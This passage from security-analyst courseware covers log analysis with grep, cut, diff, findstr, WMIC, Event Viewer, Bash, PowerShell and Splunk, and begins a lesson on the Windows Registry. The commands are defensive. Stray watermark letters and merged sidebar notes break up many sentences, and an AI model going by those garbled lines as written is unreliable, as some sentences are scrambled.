similar to how grep and cut work with individual lines. The actual output of diff displays each line
that is not the same, along with a summary of where those lines are and how they need to be
changed to make the first file identical to the second file.
The diff Command
e
In the following example, syslog has the following three lines: The logs in these
at
1. Feb 11 localhost examples have been

truncated for clarity.
2. Mar 13 localhost
lic
3. Mar 13 server00
And syslog.1 has the following three lines:
1. Feb 11 localhost
up
2. Feb 11 localhost
3. Mar 13 localhost
Using diff syslog syslog.1 will return the following:
D
1a2
> Feb 11 localhost
ot
3d3
< Mar 13 server00
The 1a2 code means that after line 1 in the first file, line 2 from the second file needs to be added.
N
Feb 11 localhost is the line in question. The 3d3 code means that you need to delete line 3 in the
first file so that line 3 matches up in both files. Mar 13 server00 is the line in question.
o
D

e
ut
ib
tr
is
Figure 8-3: The previous example in action.
D
Note: You can also output the results side by side in two columns using the -y flag.
or
The diff command is useful for log analysis when you need to correlate actions across multiple log
files in different systems. You can use time values with diff to pinpoint when an event happens,
and to see if other logs recorded that same event around the same time. You can also use diff to
e
ensure that logs haven't been tampered with by comparing one log with a backup.
at
Consider informing
students that, in some Piping
cases, the order in which
Linux commands like grep, cut, and diff are further beneficial to security analysts because they
lic
you pipe in commands

matters. can be combined into a single command—a process called piping. Piping uses the pipe character (|)
to separate commands. For example, to return only lines in syslog that deal with the
NetworkManager process, while also cutting each line so that only the date, time, source, and
up
process display, you would enter:

grep "NetworkManager" /var/log/syslog | cut -d " " -f1-6
D
ot
N
o
Figure 8-4: In this example, the grep command feeds into the cut command, producing a more
D
focused output.
The findstr Command

The findstr The findstr command is essentially the Windows version of grep. It searches text files for a
Command particular string that you provide, and returns the lines that contain this string. The findstr

command has a slightly different syntax than grep, but it includes most of the same basic options.
For example, you can use the /i option to specify case insensitivity.
The following is an example of the findstr command:
findstr /i "ICMP" C:\Windows\system32\LogFiles\Firewall\pfirewall.log
This searches a Windows Firewall log for instances of Internet Control Message Protocol (ICMP)
packet entries.
e
ut
Figure 8-5: The previous example in action. The results show four different entries of ICMP
ib
packets being allowed through the firewall.
The find Command
tr
On Windows, the find command is an older version of the findstr command. They are very
is
similar, but one major difference is that find does not support regular expressions. Also, find is
not compatible with Windows PowerShell and must be run from the traditional Windows command
prompt (cmd.exe).
D
Note: The Windows find command should not be confused with the Linux find command,
which is used to locate files in a directory.
WMIC for Log Analysis

or
e
Despite its use by attackers, Windows Management Instrumentation Command-line (WMIC) can WMIC for Log Analysis
at
also be helpful to security analysts who need to review log files on a remote Windows machine. The
main alias you can use in WMIC to review logs is NTEVENT. NTEVENT will, given a certain input,
return log entries that match your parameters.
lic
For example:
wmic NTEVENT WHERE "LogFile='Security' AND EventType=5" GET
SourceName,TimeGenerated,Message
up
This will look in all Security event log entries whose events are type 5 (audit failure). It will then
return the source, the time the event was generated, and a brief message about the event. This can
be useful for identifying specific events based on their details, without actually being at the target
D
computer and combing through Event Viewer.

ot
N
o
Figure 8-6: The previous example in action.

D
Event Viewer
Event Viewer is the main graphical hub for viewing event logs on a Windows computer. As you've Event Viewer
seen, Windows logs events in one of several different categories, and Event Viewer provides views
for each category. Several of these event categories further classify events by their severity:
• Information: Successful events.

• Warning: Events that are not necessarily a problem, but may be in the future.
• Error: Events that are significant problems and may result in reduced functionality.
• Audit Success/Failure: Events that indicate a user or service either fulfilled or failed to fulfill
the system's audit policies. These are unique to the Security log.
Beyond general category and severity, Event Viewer displays detailed information for each log entry,
including the subject of the entry; details of the error (if there is one); the event's ID; the source of
the event; a description of what a warning or error might mean; and more.
The real power of Event Viewer is that it gives you several easy-to-use options for managing your
e
logs. You can filter logs by many different characteristics, like date and time, severity, event ID,
source, and much more. Filtering is crucial in helping you avoid the clutter of thousands of events
ut
that get logged. Additionally, you can also create custom views within Event Viewer so it's easier to
monitor only the events you care about. You can also adjust log properties, like the maximum size
of each log, and you can create backups of logs in case of data loss. You can also clear logs manually
ib
when you no longer need them.
tr
is
D
or
e
at
lic
up
D
Figure 8-7: Log entries in Event Viewer.
Bash
ot
Bash Bash is a scripting language and command shell for Unix-like systems. It is the default shell for
N
A deeper dive into most Linux distributions, and has its own command syntax. Tools like grep, cut, and diff are built
programming into the Bash shell.
fundamentals is beyond
Beyond individual command entry, Bash is also powerful in that it can run complex scripts. Similar
the scope of this course.
o
to standard programming languages, Bash supports elements like variables, loops, conditional
statements, functions, and more. Bash scripting can aid the log analysis process by automating
D
various commands—the analyst can write the script and execute it all at once, and they can use this
same script over and over at different points in time. Because time is such a precious resource for
any cybersecurity professional, creating custom scripts for an environment is a great way to optimize
daily log analysis tasks.
The following is an example of a simple Bash script named nm-script that uses some of the
commands already discussed:

#!/bin/bash
echo "Pulling NetMan entries..."
grep "NetworkManager" /var/log/syslog | cut -d " " -f1-6 > netman-log.txt
echo "NetMan log file created!"
The first line of the script indicates what type of interpreter the system should run, as there are
many different scripting languages. The echo lines simply print messages to the console. The grep
line pipes in cut to trim the syslog as before, and outputs the results to a file called netman-log.txt.
Note: In order to run a script in Linux, that script file must have the execute bit (x) set on it.
e
ut
ib
tr
is
D
or
e
at
Figure 8-8: The previous script runs and the output is displayed.
lic
Note: For a more in-depth look at Bash scripting, visit www.tldp.org/LDP/abs/html/.

up
Note: Windows 10 includes a Linux subsystem that supports the Bash shell.
D
Z Shell
The Z shell, also called Zsh, is an updated version of the Bash shell. The Z shell has been the
ot
default shell of Kali Linux since version 2020.4, and the default shell of macOS since Catalina
(2019), both of which previously defaulted to Bash. The syntax of the Z shell is essentially the same
as Bash, so your scripts will work in both environments without modification.
N
Windows PowerShell
o
Windows PowerShell is a scripting language and shell for Microsoft® Windows that is built on Windows PowerShell
D
the .NET Framework. Microsoft started packaging PowerShell with Windows with the release of
Windows 7 and Windows Server® 2008 R2, and it is the default shell on Windows 10 and 11, as well
as Windows Server 2019 and 2022. PowerShell is often used by administrators to manage both local
and remote hosts as it integrates with Windows Management Instrumentation (WMI). PowerShell
offers much greater functionality than the traditional Windows command prompt.
PowerShell functions mainly through the use of cmdlets, which are specialized .NET commands
that interface with PowerShell. These cmdlets typically take the syntax of Verb-Noun, such as Set-

Date to change a system's date and time. Like other command shells, the cmdlet will take whatever
valid argument the user provides.
PowerShell is also able to execute scripts written to its language. Like Bash, the PowerShell scripting
language supports a wide variety of object-oriented programming elements. These scripts provide
the same benefit as before—the ability to automate log analysis tasks to cut down on the time it
takes to constantly type out a command. Also, since there are so many cmdlets available to
PowerShell, creating multiple custom scripts will help you avoid having to remember each cmdlet or
constantly look them up.
e
Consider pointing out to The following is an example of a PowerShell script named log-fail-script.ps1:
students, if they haven't Write-Host "Retrieving logon failures..."
ut
noticed, that PowerShell Get-EventLog -Newest 5 -LogName Security -InstanceId 4625 | Select
supports piping.
Timewritten, Message | Out-File C:\log-fail.txt
ib
Write-Host "Log created!"
The Write-Host cmdlets function similar to echo by printing the given text to the PowerShell
window. The Get-EventLog cmdlet line searches the Security event log for the latest five entries
tr
that match an instance ID of 4625—the logon failure code. The time the event was logged and a
brief descriptive message are then output to the log-fail.txt file.
is
D
or
e
at
lic
up
Figure 8-9: The previous script runs and the output is displayed.
D
Additional Log Analysis Tools

ot
Additional Log Analysis The following table describes some additional tools that could round out your log analysis toolkit.
Tools
N
Tool Description
awk A tool commonly found on Unix-like systems, awk is a scripting engine

o
geared toward modifying and extracting data from files or data streams,
which can be useful in preparing data for analysis. Programs and scripts
D
run in awk are written in the AWK programming language.

tail Another tool included in Unix-like systems, tail outputs the last 10 lines
of a file you provide. You can also adjust this default value to output
more or fewer lines. Likewise, you can use the -f switch to view a real-
time list of the last few lines as the file is updated. This tool is very useful
for reviewing the most recent entries in a log file.

Tool Description
Simple Event SEC is a lightweight tool that runs as a single process that monitors a
Correlator (SEC) stream of events. It can detect and act on event patterns, producing
output through external programs such as snmptrap or mail, writing out
files, sending data to servers, calling pre-compiled Perl® scripts, and so
forth.
Microsoft Log Parser This command-line tool, targeted toward Windows logs and available as a
e
free download from Microsoft, provides a querying capability for
Microsoft log files and Registry entries, as well as XML, comma-separated
ut
values (CSV), and other common formats.
Logwatch Logwatch is a customizable log analysis system available for free
ib
download. This utility parses system logs and creates a report on various
aspects that you specify. Multiple configuration sources, including various
configuration files and command-line arguments, help to support scripted
tr
automation. Logwatch has a plug-in interface that enables you to
customize it to your needs.
is
Kiwi Syslog® Server Kiwi Syslog Server is a Windows-based proprietary log management
platform that collects Linux syslog and Windows event log data from a
D
variety of different networking and host-based appliances. It can also
generate alerts based on the log data it receives, and it can be configured
to take action on these alerts. Kiwi Syslog Server is essentially a
Visualization tools
organizations. or
lightweight version of a SIEM that is best used in small and mid-size
Visualization tools can help you identify patterns in your logging data
e
much more easily than scanning columns of text and numbers. Charts
at
(potentially with animation) make it easier to see trends and outliers, and
anomalies over time. SIEMs or other log analysis tools often include
integrated charting and visualization tools, or you can create your own
lic
charts from logging data using tools such as gnuplot, the Python
Matplotlib library, the Google Charts application programming interface
(API), Tableau, and Microsoft Excel®.
up
Big data analysis tools Big data tools such as Google BigQuery and Apache™ Hadoop® can be
useful platforms for developing your own analysis tools. Third-party
cloud-based apps also provide log analysis services.
D
Long Tail Analysis

ot
All the tools mentioned in this topic can help you shape logs and extract useful information from Long Tail Analysis
them. However, the usefulness of any tool is dependent on the user's aptitude. While you may have
N
taken care to tune your logs to eliminate as much noise as possible, you'll never produce the perfect
log. That's why, during the analysis phase, you'll need to do some additional manipulation to get
your logs to report on the most valuable information possible, while suppressing irrelevant events.
o
One powerful method for separating the signal from the noise is long tail analysis.
In its original context, the "long tail" is a property of statistical distributions in which a high
D
population dominates initially, but then "tails off" into a low population. This has been applied to a
retail business context in which a small set of unique items is sold in large quantities, compared to a
large set of unique items sold in small quantities (the long tail). Its application in a security context
has been simplified: long tail analysis is the process of culling low-frequency events to identify
anomalies.

Long tail analysis starts from the assumption that one unique event in a sea of thousands is more
likely to be relevant to a security analyst than a common event that has numerous entries. In other
words, the more common an event is, the less useful it is—and the less common an event is, the
more useful it is. This is not universally true, and there are some exceptions, but for the most part, a
low-frequency event can indicate anomalous behavior that you'll want to examine.
Consider a simplified version of the previous example of the Get-EventLog command in
PowerShell:
Get-EventLog -LogName Security -InstanceId 4625
e
This will retrieve all logon failure events in the log. In a log where thousands of people are logging
on every single day, this could end up retrieving an overwhelming amount of data. Instead, you
ut
could take a step back and first identify what instance IDs are actually useful to you. To do that, you
can sort the log by how many entries are logged for each instance ID:
ib
Get-EventLog -LogName Security | Group-Object -Property InstanceId -NoElement
| Sort-Object -Property Count
The truncated result might be something like the following:
tr
Count Name
is
----- ----
1 4740
5 4698
D
5 4699
21 4661
...
4302
13801
63906
4625
4624
4558
or
e
From this result, you might choose to focus on examining events 4740 (a user account was locked
out), 4698 (a scheduled task was created), and 4699 (a scheduled task was deleted). These events are
at
much less common and may indicate suspicious or unwanted behavior—more so than the general
logon failure event (4625) would.
lic
Guidelines for Using Linux- and Windows-Based Tools for Log

Analysis
up
Guidelines for Using Use the following guidelines when analyzing logs on Linux and Windows systems.
Linux- and Windows-
Based Tools for Log Use Linux-Based Log Analysis Tools
D
Analysis
Follow these guidelines when analyzing logs on a Linux system or analyzing logs from a Linux
system:
ot
• Ensure that you know the format of common Linux logs, like the syslog.
• Use grep when you need to search for specific strings in a log file, like a particular source or
N
event ID.
• Consider the different options available for grep, like ignoring case sensitivity and searching for
discrete words.
o
• Use the cut command to manage the length of your logs.

• Create a delimiter with cut so that it returns more accurate results.
D
• Use diff to examine the ways two logs diverge in content.

• Use piping to run multiple commands together.
• Use Bash shell scripts to automate entering these commands.

Use Windows-Based Log Analysis Tools

Follow these guidelines when analyzing logs on a Windows system or analyzing logs from a
Windows system:
• Ensure that you know the format of common Windows logs, like the Security event log.
• Use findstr when you need to search for specific strings in a log file, like a particular source or
event ID.
• Consider the different options available for findstr, like ignoring case sensitivity and searching
for discrete words.
e
• Use WMIC and the NTEVENT alias to pull logs from a remote computer.
• Use Event Viewer's graphical interface to filter logs and create custom views for you to monitor.
ut
• Use Windows PowerShell scripts to automate the task of retrieving log file information.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 8-1
Analyzing Linux Logs for Security Intelligence
Before You Begin
e
You'll be working in your Kali Linux virtual machine (VM).
ut
Activity: Analyzing Linux
Logs for Security Scenario
Intelligence
In order to examine your organization's Linux logs, you decide to use both the grep and cut
ib
commands to find specific information and make that information more readable. This will make
your log analysis efforts more efficient.
tr
Verify the logs in your Linux log folder.
is
1.
a) On your Kali Linux VM, open a terminal.
D
Consider pointing out b) Enter cd /var/log
the location of log files This is the primary log folder for Linux.
varies from distribution c) Enter ls
to distribution.
2.
of these logs. or
Note the variety of logs in this folder. You can use the commands in this activity to search any or all
Use grep to search within the Linux syslog.

e
a) At the terminal, enter man grep and note the options available with the grep command.
at
This is an extremely useful tool for searching any file, not just logs.
b) Scroll through the grep manual until you return to a prompt.
lic
Note: You can also press q to return to a prompt.

up
D
ot
N
o
D

c) Enter sudo grep "root" syslog
e
ut
ib
tr
is
D
or
This shows all instances of the word "root" in the syslog file. You can search for any text string in
e
any file this way.
at
Note: These searches are case sensitive by default.

lic
d) Enter sudo grep "root" syslog*

The asterisk ( * ) is a wildcard character, so this command searches for the word "root" in all files
that start with "syslog" (syslog, syslog.1, syslog.2.gz, etc.).
e) Enter sudo grep -i "error" syslog*
up
The -i flag makes the search case insensitive.
3. How would you use grep to look for a negative match for a pattern rather than
D
a positive match?
A: The -v flag does a negative match.
ot
4. Use cut to make your syslog entries more readable.

a) At the terminal, enter sudo cut -c1-15 syslog
N
This command displays the first 15 characters of each log item in the file. In most cases, it includes
the date and time of each log item.
b) Enter sudo cut -c16-35 syslog
o
This command displays characters 16 to 35, which generally include the source of each log item
(e.g., the kali host), as well as the process/application that made the log entry. Of course, the
D
length of each field affects what gets printed, so you'll want to use a more elegant way to retrieve the
desired information.

c) Enter sudo cut -d ":" -f1-3 syslog
e
ut
ib
tr
is
D
or
The -f flag enables you to search by fields. In this case, the first three fields are displayed. The -d
e
flag enables you to specify what separates (delimits) each field. In this case, the fields are separated
by a colon, which produces the date, time, source, and process/application.
at
5. What other useful delimiters are there?

lic
A: Answers will vary, but major delimiters include space, tab, period, and comma.
6. Combine grep and cut.

up
D
ot
N
o
D

a) Enter sudo grep -i "error" syslog* | cut -d " " -f1-5 Ensure that students are
placing a space between
the quotes in this
command.
If no error events are
found, consider having
students use terms like
"warning" or "critical"
instead.
e
ut
ib
tr
is
D
or
You can use the pipe (|) character to link Linux commands together. This command shows the first
e
five fields, delimited by spaces, of the syslog entries that include the word "error" (case insensitive).
at
Kali Linux may not have

7. The syslog.1 file is yesterday's log file. produced yesterday's
log file for students to
lic
How would you identify warnings in this log? test this command. The
same command could
A: Answers may vary, but it would be something like sudo grep -i "warning" syslog.1 | be executed on the main
cut -d ":" -f1-3 log file, however.
up
D
ot
N
o
D

TOPIC B
Use SIEM Tools for Analysis
SIEM deserves particular mention, as it's one of the most powerful log analysis tools available to
you. A properly configured SIEM can provide you with incredible insight into your security
intelligence.
e
ut
Security Intelligence Correlation
Security Intelligence Taken in combination, events that seem completely valid and proper on their own may reveal a
ib
Correlation security problem. For example, your virtual private network (VPN) logs show that Jane Doe, one of
your sales representatives who regularly travels to Asia, has logged in to your network from a
location in Beijing. Moments later, your radio frequency identification (RFID) physical security
tr
logging system shows that Jane has swiped her ID card at the front door of your corporate office in
Rochester, NY. While neither of these events would individually show up as an anomaly, combined
is
they provide good evidence that you have a security problem.
D
Security Information and Event Management (SIEM)
Security Information and Security information and event management (SIEM) solutions provide real-time or near-real-
Event Management
(SIEM) or
time analysis of security alerts generated by network hardware and applications. SIEM technology is
often used to provide expanded insights into intrusion detection and prevention through the
aggregation and correlation of security intelligence. SIEM solutions can be implemented as software,
e
hardware appliances, or outsourced managed services.
SIEM products are excellent tools that can help an organization streamline its network security
at
administration. Productivity in the areas of log analysis and auditing network systems is likely to
increase, as SIEM solutions will help administrators more easily identify problems that would
lic
otherwise take them a very long time to detect. This is especially crucial in responding to a security
breach where every second counts.
The effective deployment of a SIEM program involves the following considerations:
up
• The SIEM solution should log all relevant events and not be cluttered with irrelevant data.
• Establish and clearly document the scope of events. This will help you support the previous
bullet point.
D
• Define exactly what you do and do not consider a threat.

• Have a plan about what should be done in the event that you are alerted to a threat.
• Establish a robust ticketing process to track all flagged events.
ot
• Schedule regular reviews of logs so you don't miss any important events that have escaped alerts.
• Provide auditors and forensic analysts with a trail of evidence to support their duties.
N
SIEM Analysis
o
SIEM Analysis In many cases, intelligence loses value over time. So, the intelligence that you capture and analyze in
real time or near real time would be the most valuable. In some cases, such timely intelligence might
D
enable you to limit or completely avoid the damage resulting from an attack. But gathering and
analyzing security intelligence takes a lot of effort. Many tedious tasks are involved in the process:
identifying relevant data, collecting it, transforming it into a useful form, aggregating different
sources and correlating them, analyzing the correlated data to find patterns that are significant for
security, and finally identifying actions you should take in response to those significant security
patterns. SIEMs are intended to automate much of the process of gathering and analyzing security
intelligence, improving its timeliness.
Lesson 8: Analyzing Log Data | Topic B

e
ut
ib
tr
is
D
or
e
Figure 8-10: SIEM's presence in the security intelligence lifecycle.
at
As shown here, SIEMs can be configured to automate much of the security intelligence lifecycle,
lic
predominantly in the collection and processing phases. SIEMs can even automate some of the tasks
involved in analysis, production, and dissemination. Of course, a lot of planning and configuring is
required to enable a SIEM to accomplish these tasks. SIEMs can help with some of the planning
and direction phase by providing templates, discovery features, and other functions. Even though a
up
SIEM can automate numerous tasks, there are still significant gaps that require human intervention,
including dissemination and integration, planning and direction tasks, and of course, analysis.
To some extent, some of your analysis work can be reduced through careful planning and direction
D
on the front end of the lifecycle. For example, in the process of evaluating what information you
will collect to meet your security and compliance requirements, you are conducting a front-end
analysis. This process will save you (and the SIEM) significant work later on. While a SIEM could
ot
conceivably collect all the logs across your systems, this is not a good idea. It is best to configure the
SIEM to focus on the events related to security and compliance that you need to know about, which
you have already identified through your risk management analysis. Too much information can bog
N
down the work performed by the SIEM, create unnecessary network traffic, and create more work
for you when it's time to analyze information produced by the SIEM. All of these can affect the
o
timeliness of the security intelligence that you produce.

D
SIEM Tools
Common SIEM tools include:
• Splunk®: A proprietary SIEM that has a limited free version for individuals, a paid enterprise
version, and a paid cloud-based version.
• ArcSight Enterprise Security Manager (ESM): A proprietary SIEM maintained by Micro
Focus and previously the property of Hewlett-Packard (HP).
• IBM® Security QRadar®: A proprietary SIEM.

• Open Source Security Information Management (OSSIM): An open source SIEM

developed by AlienVault® that is delivered as its own operating system, rather than as an
independent application.
SIEMs and AI
Modern SIEM systems incorporate artificial intelligence (AI) and machine learning capabilities that
enhance collection and correlation activities. For example, the SIEM might be able to train a
machine learning model that is able to intelligently classify useful and relevant data while also
identifying data that is not worth collecting. Likewise, the SIEM may be able to use correlations and
e
other characteristics of the data to determine when an event requires attention and what the
ut
appropriate response should be.
Agent-Based vs. Agentless SIEMs
ib
Agent-Based vs. SIEMs typically collect data from various hosts in one of the following ways:
tr
Agentless SIEMs • Agent-based: With this approach, you must install an agent service on each host. As events
occur on the host, logging data is filtered, aggregated, and normalized at the host, and then sent
is
to the SIEM server for analysis and storage. This approach only sends required data to the
server, keeping network traffic to a minimum.
D
• Agentless: With this approach, you do not have to install and configure an agent service on each
host. The SIEM server periodically has to log in to each host it is monitoring to retrieve log
updates. Because data is not pre-processed by an agent, larger amounts of data (much of it
aggregated, and normalized.

or
unnecessary) must be sent across the network to the SIEM server, where it is then filtered,
Although they do not provide a complete alternative to skilled (human) security analysts, some
organizations may find that these tools are a valuable addition to their security intelligence collection
e
toolkits.
at
Other Applications of Agent-Based and Agentless Data Collection

SIEMs are not the only device that can rely on agent-based or agentless data collection. For
lic
example, a scanning tool like Nessus collects vulnerability data from devices that you've deployed its
agents to. An asset discovery and management tool like ManageEngine AssetExplorer can use
Windows Management Instrumentation (WMI) to scan devices without having agents installed on
up
them.
Guidelines for Using SIEMs for Security Intelligence Analysis

D
Guidelines for Using Follow these guidelines when using a SIEM for security intelligence analysis.
SIEMs for Security
ot
Intelligence Analysis Support Compliance When Using a SIEM

Follow these guidelines to ensure your use of a SIEM will enable you to conform to compliance
requirements:
N
• Preserve data as required in its original forms. SIEMs generate new versions of data that may not
satisfy some compliance requirements. Be careful to preserve original logs and other data that
o
might be required by regulations and standards you must follow.

• To support compliance regulations and help to ensure follow-up, configure the SIEM, if
D
possible, to generate important alerts in a form such as support tickets, which automatically
document threats you have detected and are following up on.
• Review your logs on a frequent, regular basis.
• Ensure that SIEM monitoring can generate documentation to show your systems are frequently
scanned for threats and that logs and alerts are regularly reviewed by personnel.

Configure a SIEM for Comprehensive Security

SIEMs are most useful when they receive information from a wide variety of sources, which they
can aggregate to reveal better insights than any of those sources can produce alone. Follow these
guidelines when configuring your SIEM:
• Configure your SIEM to aggregate data from many boundary, network, and data defenses, such
as firewalls, intrusion detection, enterprise anti-malware tools, and data loss prevention, where
they can drive reports and alerts, and be correlated with other events to provide improved
security intelligence.
e
• Configure your SIEM to identify unauthorized assets and software. By using the SIEM to
maintain your inventory of authorized assets and software, you have a reference baseline from
ut
which the SIEM can quickly identify any assets or software that are not on the approved list.
• Use the SIEM to monitor configurations of hardware and software on servers, workstations, and
notebook computers, and provide alerts when a misconfiguration is identified.
ib
• Use the SIEM to monitor configurations of wireless devices and wireless intrusions, and provide
alerts when a misconfiguration is identified.
tr
• Use the SIEM to monitor configurations of rules, policies, access control, and other
configurations on network devices such as firewalls, routers, and switches.
is
• Configure the SIEM to report on the unnecessary use of administrator privileges, such as a user
with administrative access running a web browser on a server.
D
• Correlate user activities with user rights and roles to reveal violations of least-privilege
enforcement.
• Configure the SIEM to perform continuous vulnerability assessment and remediation.
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 8-2
Incorporating SIEMs into Security Intelligence
Analysis
e
Before You Begin
ut
Activity: Incorporating You'll be using Splunk, a SIEM tool, which has been installed on your Windows Server.
SIEMs into Security
Intelligence Analysis Scenario
ib
With logs coming in from all over your network, you realize you need the centralized analysis
platform a SIEM can provide. After looking at some of the providers, you decide to test Splunk to
tr
see how well it will operate in your environment. You'll analyze your server's event logs in the wake
of the password attack you launched back in the "Analyzing Attacks on Computing and Network
is
Environments" lesson.
Ensure students
understand that this
D
activity is just a taste of 1. Sign in to Splunk.
what a SIEM can do.
Leveraging the full a) Open a web browser on your Windows Server and navigate to http://localhost:8000.
power of a SIEM
requires more complex
configuration that is
beyond the scope of this
or
b) Verify that you are automatically signed in.
e
course.
at
lic
up
D
Note: The user name is admin and the password is Pa22w0rd if you need to
sign back in for any reason.
ot
2. Set up Splunk to monitor Windows event logs.

N
a) In the right pane, select the Add Data button.

b) Scroll down, and under the Or get data in with the following methods section, select Monitor.
o
D

c) From the navigation pane on the left, select Local Event Logs.
e
ut
ib
tr
is
D
or
e
at
lic
Note: Notice that you can also monitor local and remote systems.
d) In the right pane, select the add all link next to the Available item(s) list.
up
D
ot
N
o
D
e) At the top of the page, select the Next button, then Review, then Submit.
f) Select the Start Searching button.

g) Verify that the search box displays a search query with the source as your Windows event log and
the host as your server's computer name.
e
h) If necessary, press Enter to run the search query.
ut
3. Run queries to search for Secure Shell (SSH) connections to your server.
a) Remove the search query and type error, and then press Enter.
ib
Note: Splunk is currently monitoring only one source (event log) and host
(your server), so you don't need to include this information in the query.
tr
b) Search for sshd 10.39.5.#, where # is your Kali Linux VM's IP address.
is
c) Verify that there are many entries for attempted SSH connections to the server.
D
or
e
at
lic
up
D
d) Search for sshd password fail* to search for SSH connection attempts that failed.
This searches for any text that includes "sshd", "password", and any text that starts with "fail". So,
ot
both "failed" and "failure" will appear in the results.
Note: Splunk assumes a logical AND between two terms unless otherwise
specified. In this case, Splunk will only return results that include "sshd" and
N
"password" and "fail*" in a particular event entry. You can also type OR
between each term to specify a logical OR operation.
o
4. Is there any evidence of the SSH password attack you ran in the "Analyzing
D
Attacks on Computing and Network Environments" lesson?

A: Yes, Splunk should show many password failures (hundreds) depending on what experimentation
you may have done.

5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack
Techniques" lesson, why do log entries concerning SSH still appear?
A: There are two reasons. The most obvious is that you used SSH after you cleared the Application
log, so any of that activity would be logged. However, there are still SSH logs from the cracking
attempt in the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned
in the previous question. This is because some SSH activity is also sent to the Security log, which
you likely didn't clear. Remember, you performed online dictionary cracking using Ncrack; it tried
and failed to connect using many different passwords before it successfully connected with the
correct password.
e
6. How would you look specifically for SSH password failures for the
ut
Administrator account that came from Kali Linux?
A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the
ib
last octet of your Kali Linux IP address will work.
7. Refine your search.
tr
a) At the top-left of the page, select the Search tab.
is
D
b)
c)
or
Select the Data Summary button to return to the default view of the data.
From the Data Summary pop-up, select Hosts, then select your server.
e
d) For any event listed, select the Show all n lines link to open more information about that event.
e) Select any of the fields that interest you, and then select Add to search.
at
lic
up
D
ot
N
o
D
Notice that you can continue to hone your search with this method.

f) Refine your search some more, or start over and try a fresh search. Try adding OR between your
search terms to see how that changes your output.
Note: Logical operators must be in all caps in Splunk.
g) Enter error OR fail* OR severe as the search query.

This will help you find all errors, even those that happen to use different terminology.
8. What other sources of data would you load into Splunk in the Develetech
e
network?
ut
A: Answers will vary, but should include firewall logs, intrusion detection system (IDS) logs, web
server logs, and logs from other critical systems.
ib
9. How does a system like this aid security management?
A: Answers will vary, but could include: it pulls all logs into one place for analysis and enables the
tr
massaging of data and reconstruction of events for incidents.
10.Close Splunk.
is
D
or
e
at
lic
up
D
ot
N
o
D

Summary
In this lesson, you analyzed log data by using a variety of different tools and techniques. You used
common tools available for Windows and Linux to assist in the analysis process, as well as took
advantage of the power of SIEMs. By combining these tools and techniques into a comprehensive
log analysis strategy, you'll be able to extract actionable intelligence out of your logs while
circumventing the noise.
e
What are some of the tools you use most often to analyze log data? use the social
ut
A: Answers will vary. Students will likely have some familiarity with Linux, and may prefer to use tools like networking tools
grep, awk, and cut to aid them in analysis tasks. Others may need to perform analysis of Windows provided on the CHOICE
system logs and will use command-line tools like findstr or GUI tools like Event Viewer. Whatever Course screen to follow
ib
they use, students will also likely see the value in scripting the use of these tools for automation—they
can do this through the scripting languages Bash (Unix-like) or Windows PowerShell, among others. for further discussion
tr
How could/does a SIEM in your organization or an organization you're familiar continued learning.
with help increase productivity in the security intelligence lifecycle processes?
is
A: Answers will vary. SIEMs provide the most support in the intelligence lifecycle in the collection and
processing phases. They can automate the collection of data from disparate sources (e.g., business
D
application logs from Windows client computers and Linux syslogs from critical servers), as well as
correlate that data so that it becomes more useful for analysis (e.g., normalizing time attributes across
logs with different formats). In some cases, students using SIEMs may be able to speed up their
or
analysis efforts if they can program their SIEM solution to spot common malicious patterns (e.g.,
repeated failed attempts at remote authentication to multiple critical servers). However, SIEMs are not
a full replacement for human analysis processes. Students may also be able to leverage a SIEM's
ability to disseminate data and integrate that data with other solutions, but again, human intervention
e
is usually necessary to round out this process.
at
lic
up
D
ot
N
o
D
Lesson 8: Analyzing Log Data |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

9 Performing Active Asset
and Network Analysis
e
ut
ib
tr
is
Lesson Introduction
D
The analysis you perform on log data is important, but it tends to remain static. Most of the
intelligence you'll be gathering and analyzing from logs will be actionable only after the event
or
is either underway or already finished. So, to complement this static analysis, you need
something a bit more dynamic. That's why, in this lesson, you'll take a more active approach
to analyzing your organizational assets.
e
Lesson Objectives
at

lic
• Analyze incidents with Windows-based tools.

• Analyze incidents with Linux-based tools.
up
• Analyze common indicators of potential compromise.

D
ot
N
o
D

TOPIC A
Analyze Incidents with Windows-Based Tools
The Windows® architecture is unique among operating systems, and requires certain tools to analyze
every dimension of that architecture. In this topic, you'll use some of the most common of these
tools.
e
ut
Registry Analysis Tools for Windows
Registry Editor The Windows Registry stores configuration information for low-level Windows processes and
ib
(regedit) services, as well any apps that choose to use it. Because low-level elements like the Windows kernel
and device drivers store settings in the Registry, it is a common target for attackers who want to
manipulate components crucial to Windows operating normally. The Registry is also used as a
tr
vector for hiding malicious app settings that aren't easily detected through manual analysis or
automated tools.
is
The default Registry editor that Windows provides is called regedit, or the Registry Editor. The
Registry Editor provides a File Explorer–like GUI for viewing the structure of the Registry.
D
Ultimately, at the end of each path in the Registry is a single entry. The format of each entry is as
follows:
or
• The key, which is similar to a folder or other container structure.
• The value, which is similar to a file in that it holds the data. Keys can have multiple values.
• The value type, which tells Windows how to parse the value's data (such as if the data is in a
string format, a binary format, etc.).
e
Keys with similar purpose or relevancy are organized into one of several hives. For example, most
at
third-party software will be grouped into the HKEY_LOCAL_MACHINE\SOFTWARE hive.

The root of this hive is typically shortened to HKLM, and it also contains the \SYSTEM,
\SECURITY, and \SAM hives. Another hive of note is HKEY_CURRENT_USER, or HKCU,
lic
which contains value data about the currently logged-in user.

up
D
ot
N
o
D
Figure 9-1: The Registry Editor.
Lesson 9: Performing Active Asset and Network Analysis | Topic A

Analyzing the Registry through regedit can reveal several things. You can search HKLM for Analysis with Registry
drivers attached to the operating system to identify unknown keys or known malicious ones. You Editor
can also search HKCU for the most recently used (MRU) files (\SOFTWARE\Microsoft
\Windows\CurrentVersion\Explorer\RunMRU) to see if any malicious entries have been made
recently by the user based on their activity. Essentially, comparing known key values to their current
values can help you identify tampering. You should especially watch the keys of processes and
applications like cmd.exe, explorer.exe, Session Manager, System Policy, and others that could
potentially grant a user control over the system. Many values have no data set, but a lack of data in a
value could also indicate it was maliciously removed.
e
One of the biggest drawbacks to regedit is that it doesn't display the last modification time of a
ut
value, despite this information actually being recorded. You need to first export the key to a text file,
which will then print the time values.
ib
Additional Registry Tools
Some third-party alternatives are available to you should regedit not be what you're looking for.
tr
